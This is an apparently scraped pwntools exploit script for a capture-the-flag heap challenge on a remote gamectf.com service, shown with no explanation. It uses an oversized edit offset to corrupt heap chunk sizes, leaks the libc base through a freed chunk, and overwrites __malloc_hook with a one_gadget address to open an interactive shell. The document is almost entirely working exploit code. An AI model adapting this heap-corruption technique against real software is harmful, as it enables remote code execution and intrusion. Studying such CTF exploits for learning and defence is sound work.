1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
| from pwn import * p=remote("8sdafgh.gamectf.com", 10001) context.log_level="debug" libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") def free(index): p.sendlineafter('5.Exit\n',"3") p.sendlineafter('Which one do you want to delete?',str(index))
def create(typd,content): p.sendlineafter('5.Exit\n',"1") p.sendlineafter('3.Large\n',str(typd)) p.sendafter("Input Content:",content)
def edit(index,size,content): p.sendlineafter('5.Exit\n',"2") p.sendlineafter('Which one do you want to update?\n',str(index)) p.sendlineafter("Where you want to update?\n",str(size)) p.sendafter('Input Content:\n',content) def show(index): p.sendlineafter('5.Exit\n',"4") p.sendlineafter('Which one do you want to view?',str(index))
create(2,'A\n') create(2,'A\n') create(2,'A\n') create(2,'A\n') create(1,'A\n') create(1,'A\n') edit(1,0x80000000,'A'*0x18+p64(0xf1)+'\n') free(1) create(2,'A\n') show(2) p.recv(6) libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols["__malloc_hook"]-0x10-88 success("libc_base====>0x%x"%libc_base) pause() create(2,'A\n') create(3,'A\n') fake_chunk_addr = libc_base+libc.symbols["__malloc_hook"]+0x10+0x10 free(2) edit(7,0,p64(0x51)+'\n') create(2,'A\n') __malloc_hook = libc_base+libc.symbols["__malloc_hook"] free(8) edit(3,0,p64(fake_chunk_addr)+'\n') create(3,'A\n') create(3,'\x00'*0x38+p64(__malloc_hook-0x10)) free(9) edit(7,0,p64(0)+'\n') create(2,'A\n') one_offset = [0x45216,0x4526a,0xf02a4,0xf1147] one = libc_base+one_offset[3] create(3,p64(one)+'\n') p.sendlineafter('5.Exit\n',"1") p.sendlineafter("3.Large\n",str(1)) p.interactive()
|